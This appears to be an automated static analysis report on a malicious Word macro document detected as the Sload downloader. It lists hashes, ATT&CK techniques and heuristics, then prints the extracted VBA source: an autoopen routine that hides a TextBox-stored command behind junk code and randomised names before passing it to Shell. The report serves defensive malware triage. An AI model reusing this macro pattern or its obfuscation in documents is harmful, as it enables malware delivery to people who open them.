Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 24e15f79c89f7fab…

MALICIOUS

Office (OLE)

Size: 82.4 KB
Created: 2018-12-14 17:17:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: 387134eb573097cae1ac7e7bc51b59d3
SHA-1: 5d6da5066c68facb737d508f234ff2d63fee3cb5
SHA-256: 24e15f79c89f7faba99ddeaad817ef9b3deeff1782d43d1d2403d22d4f57d6de
Risk score: 292

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059.001 PowerShell
  • T1059.003 Windows Command Shell
  • T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The autoopen macro triggers the execution of cmd.exe and PowerShell, indicating it is designed to download and execute a second-stage payload. The ClamAV detection 'Doc.Downloader.Sload-6786419-0' further supports its role as a downloader.

Heuristics (10)

  • ClamAV: Doc.Downloader.Sload-6786419-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Sload-6786419-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
    Matched line in script
    Set wOSzjaiavMiwOVXtlwnBDz = YicIlFlTZtupmwwW
    IjwIh = Array(zfolPNr, HwFiHjwf, MoKXV, Interaction.Shell(EGZLukHCVif, UFNwGZw), qImEzuWud)
       Select Case nQzIKtaZpHzqHSOnpTw
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
    Sub autoopen()
    rdsHZ
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8876 bytes
SHA-256: 908ba386dfd98d415943aaac7ecdfef8d7ebdbf23ff2df41aca9adff84ff3cd8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
231 of 275 identifiers look randomly generated (e.g. 'AoNKQssDaUsEPZKiqjUCGhcz') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "pXirGKdhzK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
rdsHZ
End Sub

Attribute VB_Name = "jwCWVLSqL"
Function rdsHZ()
On Error Resume Next
   Select Case OPjwrUumFokdYaNJXofnKYv
      Case 161731550
         tRVPNFIltHvESaKiYZaU = PpfrqObqkpTKRz
         YWsibrfSREFOVJ = Log(zVDcdbqYXqhuISctAcHFBh)
         sKkWNmkzFhzqwGpUbiwVsuw = 151270208
         pLEmOEkSdLRtFc = mrbNKbimLHfWDLzwONVYb
      Case 211058640
         rdNYUvYaWGMiBTjM = 165990150
         ZtijhjGdMDjjDKGd = Log(kzDJqmhIPqcwiiAwNCmiI)
         jSqjVunCCcXjzOVBiGzaSqdf = 224046435
         fmqITuboQlSHRnVNoAb = Log(fmaLTflhdqoLBwOALuJcIKz)
   End Select
Set ibpKFEBdEmttMionJtLaw = GUYUBuqwmUopcsq
   Select Case MkbaRMulSIojIXadv
      Case 129720147
         wFVZFEXiFbuiBiQ = EEwwpIhCqHQbfdEfDSaMqLWV
         ioJXamCrbVZwXQpYTiwowCc = Log(PiiEEEthcCLTXiPUNk)
         HfifBknXcYjzbM = 256912341
         vDznXcrTVFWBpTd = LwUrhzhTQhRIwFjGkWT
      Case 109462163
         zjfnOKwOmhJuFldsv = 173678535
         WdWpLiXQWPRSzNKORoDSokFi = Log(IOqTFOowXtmaqUFruawUPJhu)
         MEsHHmYsqCUhwQBcWb = 125985552
         naTzbuKGJjwjvwtKwoP = Log(NiARkJzJzrthOVj)
   End Select
Set kujNbRiGEolAWrjhMLLFa = NRzAJSqQRaNHZB
   Select Case wWHBzDkwFPnJpNNcwfXXQf
      Case 62592821
         prkdBPWZfSzTuq = jEadhjdIRnYDFmKXTM
         LHTHuqtNiWQthH = Log(oSpBcULjSpdLRmUv)
         GrfLQzfnnVzlBtrvtwsi = 114927561
         jzYARRicaKblnqczXUJOo = MzRvmPXnbMMVHfmQfOILvpJP
      Case 40987762
         TtbXYCwlnaiWfP = 30009655
         iPZRizMHovGcDXoCplwdMD = Log(JZWsMhJitHIGuqoSWhTjdw)
         hPmjjuSaaiaPsLEAai = 81856207
         VuQuLBSawtUKNFpc = Log(AdoajicTavHRjtEQiwm)
   End Select
Set sUfbrihKQBnWcbZBXnoMoalF = JQzPufGCchfzNiBB
   Select Case VQBBXWorVhYBNfQSfJY
      Case 234332107
         MmCbcDiFjSQacDoUAYauZRDM = imnNpfzwaIdwZvSGmlOHalbb
         ikzpXvjqcwRvrunTdBuKWbdI = Log(nfoEYsKLQKuzHCNuIzwBLu)
         bozkjQbDHpAkPulDFHjbjsT = 149797475
         hQOdjHdsoMQbIdvpHnKGSwAW = qubTIjUalzAMZahXrahUczd
      Case 264527052
         cEIQfjPrjpNBZjdwAWiuch = 82921885
         iaXTBRtQnjjiLJFQkVpl = Log(WSuDYbbwtKusjiFLwp)
         wwNsAwkrQOJGsbIMI = 191605100
         dpSStWlmfbAEojXoY = Log(auFnkKkjDCQXWwi)
   End Select
Set MciiTVOMFPQJVaUmjDiiK = FHhKSjVHFDWGTuKuoEfsiU
   Select Case cAbWlCCBSQwDmNQFSHh
      Case 32266878
         jXEiBzaLVNmYadzR = NsiWJJuUqGiUdtKz
         tdWsjFbpwDKfLjSoH = Log(panZOJJLrvqrTcaMkUuSdnD)
         MFkpiWLfVzUXaTPNiYOf = 339838235
         jhFzzwuoQBWHMIZ = hUjKWUHClQEjkFZXjH
      Case 147756069
         kiXNljjTASGHoO = 283762910
         vpiPaCOitNEKczbFlWkDzWZ = Log(koBSKzsVOfbrZHchPoTXbY)
         BrBVRdowZPsimAvYwUiwzXj = 210568394
         uCnIDBOLzAaIcbsaiCbh = Log(phTQXCsctiIVqXbAoWO)
   End Select
Set TpAVPTtqWOUIwCEVTrfz = jDVSnlDQZujNDIAhwB
   Select Case YhCbQoLazirXPotXcp
      Case 87490027
         BhUmkshdzjNDzr = qIWKjAFNSsZMdXXuHnlSqMQq
         HicSUnYXqCOGijBwTC = Log(LjDFalGQNZHdsfnZSduwFBo)
         UIodGjWWKWfrDcBhOWKwiZ = 147370413
         rHjSYDoKrQlRzdKdCkT = AvWpbNkiqpEvmNlwAD
      Case 329729248
         hUAmqkkkMhvwFAa = 315995424
         tqLTGTBLqijrLdzmMofvj = Log(qdzWJuGpmnpNGNmnbBwaAGAt)
         DwLsMuABuziTjK = 49031308
         AsvCwWmzZMiwIwk = Log(GVFzuzatoLLNETrqrVAN)
   End Select
Set rChKLTzPEswPFN = EKKDSCNmKYvFVoFnz
Const UFNwGZw = 0
   Select Case cNQAdYDkAXhjNKzCTpDaWmJS
      Case 128806551
         KoEkDWzFVjdfir = TqRJBazzwiNDjaqDzhaN
         fPUKlIoQYoKMzDvr = Log(ScLpHFqTNffffzDd)
         nazwPSKjYqCqmWuLo = 100423994
         CYXKdqXdIksqGjiQUuKCJAFj = odbIlUriFbpPQUIrp
      Case 12668587
         fzvHDGZRdNoCTnvpNwUXPBIB = 52511381
         AEZCKUwGEPsVYCLCNVRZWbU = Log(uvVijiruzKFUrbCTDMjj)
         rYRLMnmjiWYkuHOzUXaXzWNw = 282068904
         mSzVKsohDXDSWqEL = Log(ojkzTnUjoIIzVKVUB)
   End Select
Set TlNLfvMErwBBjT = FZPFOTfdmVkfhhMhzUqlZD
   Select Case TcILWFbuPRLFOZnFNS
      Case 245425697
         jFPEVwwwUplaRFWr = MpMpDUtjsaZITAkJOm
         NDpYJcZajloJCvjB = Log(YVfkVXdXXqBoAQCTJiS)
         RDMiuNvERXMjzIktGc = 286092256
         MAmmXlfUlqsRRdKVIBqI = YFzdSprfIMjnmLQRZGI
      Case 218897647
         SbivRWwPlFmiDnvmJFw = 262943419
         ddMdfRtEiuibAGiVhATtQX = Log(uEiXVfQBLtmpzSR)
         EEKCLEHChRQcFduYFWRZzu = 158265194
         SsWhOQjDPOPpGUvqwfq = Log(OnvizOjaAsoJjl)
   End Select
Set ShZoQkNMqOESkabcRDTKi = oiAhGCWZFJUldIWraUBaFTuw
   Select Case ijJzRblFYErPJdGfHBNo
      Case 280755963
         JcECXJkZLFFlVAkkvaLIrYMT = aajjSElmkWhsPEcVztmKXIGu
         FndhGlPlFwiDqsAUzk = Log(DsjVinsfaJZRUlMMQHEi)
         SHKHtRJAlqXXdriZRuuNF = 270017693
         ffORifkMvGrllVOoVji = SCtruinzMKQfdffcfAfUBd
      Case 181549676
         lFtDDFYibAJclXXvs = 240391720
         lpLIFqlJVEJmobcFopjwGlmE = Log(VCrIcjbRipcZznMRwDZ)
         OUBIRiGJnsACHjknu = 4788461
         VhVKlAjqCWfKhNmNABirtcS = Log(lpZSRCYWvKEktKPIlsEm)
   End Select
Set iSpUSjlMJzsPrZv = NZzzIOWICUqmZGBXfUC
   Select Case EWYlRLQUORlKHGqDoCij
      Case 25140274
         KwvjjiqNUAAlIkFX = szwucNowwhjwkMMaqMZplb
         dAwkKVzGwQMplFThlGjmwK = Log(knnLRYfhEQLVtfcib)
         bhiYXaVXiojBppTmMzWJfiTj = 47934859
         akZBJcInVcjLQNqutrw = bWBGTfHRTsNzRw
      Case 1950339
         zdiGtBUqGBjJTlpckEwEi = 124054873
         iUrTcOjuSNEwPMrJaBLAS = Log(zziDlONBwDivAlChsbZGOwPo)
         PsuWCWSQfWtlYdShQQB = 116988262
         MGHsJkaLkBiuiWWTit = Log(MiUOIwTwHZzfNWEDmmis)
   End Select
Set rEvVLruHvOmXVFpsrzwqmS = nWUXZSjjABtUaYtwFZqLKK
   Select Case skjlfnhvUODtCn
      Case 332147161
         kZFXbszGvnpXzbqsLTqqUu = mFbPznrcbwFWSUHZzm
         pswKwsYLiizISqESRzdw = Log(DKOatFYXEurDrFcovf)
         bcJuionjNCpZVnJlhj = 234172327
         nzndoFEalciWUH = rtQjmFYKUOUVPiTuELb
      Case 234276715
         ofGYjMvlYSFOQRrRzzz = 93728906
         SPTjosRhZLtXwDOJLCtdZw = Log(PHzQbdEOdVlVQmpvTdDwGLrT)
         dIouEkQWSEcobqEU = 322136895
         CKhzWVHZAVzpDQfCz = Log(PUZkVzwhNGsnwiJwoJ)
   End Select
Set jlSnfjuYcBLJZsjEcpRp = woIAhNXTfGbWWRjzhtAbb
EGZLukHCVif = pXirGKdhzK.TextBox1.Text + PKumhC + SIwqTV + OcGKIou + zDrRvH + hlWbk + tvHQuFlD + lERqfkON + dYmQjzrw + XmTXhpH
   Select Case KtLqRsFiUWiHwNdiSczZqoc
      Case 125736444
         JCpjsGzPNDpfBWBfCEp = lduYGhnhBAWQsRIqQzbP
         skJoCRFwtokmnnfHRcLTP = Log(NhYnjOLPCcZwstkj)
         PhkHMldFiciwWQ = 316019588
         fXbPOirlimHMovmWi = vlfFAwuiFlcRfMdjNWJ
      Case 132339003
         hqzdaiQQjqLQzUKmZWfUjc = 36538913
         NGuiHhPNNjNvjba = Log(iRWuQAirTuoAdzIEl)
         QTjhIBawCOHPGzvNqOGKsM = 158729852
         PNtPjOaIKqLGiw = Log(UUSwTkEoqEQIuzaz)
   End Select
Set vjSuILOnnwEQmo = uEmqZNESKZCKTFjKjsHK
   Select Case FdRNuDEnVhJFBpdPDaEQZ
      Case 306788462
         FvtBpPozHpBpJIsSafrd = pRzirNMfHaJKAMSB
         OXhiCPAATHKHil = Log(RTQdvWwBbTAPrfJwaQXQT)
         bnCziXGCXcpcthwpFjPWFOBz = 62603271
         KKjqGUOVrdawsbvYvX = PlbAlLrBzpNlDnJNvTh
      Case 144672210
         NXqTOHoobhSiYujiKw = 206488692
         SRfdrXKjOzFOBFBOl = Log(WEDMWIvHitZilUBGBwrN)
         qwEacbDcTsUzdbaLGvW = 224521107
         tRJjNlMuDFWYFjIwmthri = Log(AEhHtavvBUirzivq)
   End Select
Set qrhPnwYYvSNTBpqF = RECGslzHEBtOidCwfrAwv
   Select Case tGJIcYwizYnKzzkDCn
      Case 128641181
         zTGGOqQnWEOJnvwUYNazh = BZHWtqPwRczGXZzCtmIK
         vKdWCDPfpNUARSj = Log(swaYanmKhYWUVTorXXFPdzrn)
         QbPfFFHSDBphliIXTpdjuKWZ = 194114494
         uMRVsEnZJLXibSPCRSwJ = pwsKKOGEGFpBcLuBiIkuM
      Case 162032438
         AoNKQssDaUsEPZKiqjUCGhcz = 49453573
         BiJNOYRzrWwDpLNBPh = Log(HfcYZuNrVrTLNDwrKuMFT)
         PholnqJpERuPApYKjTBhvI = 161648635
         jztUDHDcQTPujoHX = Log(jmBQzCGSAKsDlrHJiCnzo)
   End Select
Set wOSzjaiavMiwOVXtlwnBDz = YicIlFlTZtupmwwW
IjwIh = Array(zfolPNr, HwFiHjwf, MoKXV, Interaction.Shell(EGZLukHCVif, UFNwGZw), qImEzuWud)
   Select Case nQzIKtaZpHzqHSOnpTw
      Case 80051887
         jCssuZqhcCjijFcnvRWBGlTi = QfAJPbumiEOEPP
         jrNEPLbNlztCcKqwjK = Log(itpYMbosBBOjjBBSOYOTqpS)
         JWYSbnFiuYlbtTAca = 126129683
         MWQNBascaVrApaaOpCW = NvkoHQaYuXlsXPGst
      Case 62395253
         sjLiJDYwASFKaECMQmb = 36961268
         AThDjwdZUiVjiihCQbkiT = Log(FpMLnUDpGRDnrQdbaEv)
         jkjivaVKzKrWQaNrrX = 70349907
         WibDcrmQYpAfnzt = Log(FhQNztqvahWRCmkCun)
   End Select
Set BJjCDoElJJLjTjslJHzIdofd = VUOlFwlzzsLZfMZvHjlPzClJ
End Function